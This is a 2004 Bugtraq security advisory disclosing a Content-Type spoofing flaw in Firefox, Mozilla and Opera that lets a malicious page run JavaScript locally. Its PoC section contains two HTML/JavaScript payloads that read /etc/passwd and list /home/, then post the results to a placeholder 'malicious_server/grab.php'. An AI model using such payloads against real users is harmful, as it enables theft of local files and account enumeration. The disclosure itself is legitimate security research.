[ZH2004-18SA] Content-Type spoofing in Mozilla Firefox and Opera could allow users to bypass security restrictions

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [ZH2004-18SA] Content-Type spoofing in Mozilla Firefox and Opera could allow users to bypass security restrictions
From: Giovanni Delvecchio <badpenguin79@xxxxxxxxxxx>
Date: 13 Dec 2004 23:45:24 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


Author: Giovanni Delvecchio
e-mail: badpenguin@xxxxxxxxxx

Original advisory: http://www.zone-h.org/en/advisories/read/id=6502/

Browsers tested: 

- Firefox 1.0 
- Mozilla 1.7.x
- Opera 7.54 (*)
- Konqueror 3.3.1
- Epiphany 
-Internet Explorer 6 with SP1
-Internet Explorer 6 with SP1 + SP2

Browsers affected:

- Firefox 1.0 
- Mozilla 1.7.x 
- Opera 7.51,..7.54

( maybe also previous versions)

Problem Description:
===================
A problem exists in some browsers where it is possible by a Content-Type 
spoofing to "force" the target user to open a page and bypass the security zone 
and execute javascript in local context.

Indeed, when the user "victim" visits http://malicious_server/paage.html, if 
malicious_server responds 
with a page containing an unknown Content-Type field ( for example text/html. 
,note the dot) ,the browser will show a dialog window with some options (open, 
save, cancel). Choosing "Open" to view this page, it will be downloaded and 
opened in local ; javascript code will be executed in local context.
Obviously, if the user chooses to save and open it after the result is equal.

I tested this with some browsers but it seems that just Mozilla Firefox and 
Opera(*) are exploitable in this mode.

(*) For Opera, this method of exploitation requires that opera must be set as 
Default Application in "handler for saved files" in case the user chooses 
"Open" in the dialog window.


Impact
======

It could allow remote users to :

- obtain the content of /home/ directory ( or c:\Documents and Settings\ for 
windows systems ) and therefore gather a set of usernames present on the target 
system.

- know if a particular program is installed on the target system for a 
successive attack.

- Read the content of confidential files

- Read the browser's cache
In opera it is located in ~/.opera/cache4, instead in Mozilla Firefox it's in 
/.mozilla/firefox/$RANDOM-STRING.default/Cache.
Since it is possible to enumerate the directory structure , a malicious user 
could easily know the path to firefox's cache 


PoC:
===
The following PoCs are refered to linux versions of Firefox and Opera, but they 
can be applied also to Windows versions.

In order to test Content-Type spoofing i have modified an open source webserver 
to make it respond with a fake content-Type

Example to read a local file by inner.HTML method:

--------------------------------------------------------
<HTML>

<BODY onLoad="ReadFileContent()" >

<iframe name="local_file" src="file:///etc/passwd" height=0 width=0></iframe>

<form name="module" method="post" action="http://malicious_server/grab.php"; 
ENCTYPE="text/plain"> 
<input name="content" type="hidden" size="300" >
</form>


&lt;script&gt;

function ReadFileContent(){

alert(local_file.document.all(0).innerHTML);

document.module.content.value+=local_file.document.firstChild.innerHTML;
//send content to malicious_server
document.module.submit();
}

&lt;/script&gt;

</body>

</html>

(*) it works with Firefox, with Opera it works just if a file has a .htm or 
html extension.
-----------------------------------------------------------


List the directory structure:
----------------------------------------


<html>

<body onLoad="

for(i=0;i<local_files.document.links.length;i++)
{document.module.content.value+=local_files.document.links.item(i);}
alert(document.module.content.value);
//send list_files at malicious_server
document.module.submit();

">


<form name="module" method="post" action="http://malicious_server/grab.php"; 
ENCTYPE="text/plain"> 
<input name="content" type="hidden" size="300" >
</form>


<iframe name="local_files" src="file:///home/" height=0
width=0></iframe>


</body>

</html>
-------------------------------------------


Vendor notice
==============
24th November 2004: I have contacted mozilla by security@xxxxxxxxxxx
and Opera by its bug track page at https://bugs.opera.com/wizard/ 

Response From Mozilla https://bugzilla.mozilla.org/show_bug.cgi?id=273419 :

"The problem is that Mozila use the mime-type for served by http documents but 
it
does use the extension for opening local files.
Disable the "open with" option if the application is Mozilla itself.
This would move the "who is to blame" around to the user because he has to go
through the OS Filemanager to open it."


Greets:
======
Thanks To: SI^MoNa, SecurityWireless, Siegfried for testing.

Prev by Date: phpBB Attachment Mod Directory Traversal HTTP POST Injection
Next by Date: iDEFENSE Security Advisory 12.14.04 - Adobe Acrobat Reader 5.0.9 mailListIsPdf() Buffer Overflow Vulnerability
Previous by thread: phpBB Attachment Mod Directory Traversal HTTP POST Injection
Next by thread: iDEFENSE Security Advisory 12.14.04 - Adobe Acrobat Reader 5.0.9 mailListIsPdf() Buffer Overflow Vulnerability
Index(es):
- Date
- Thread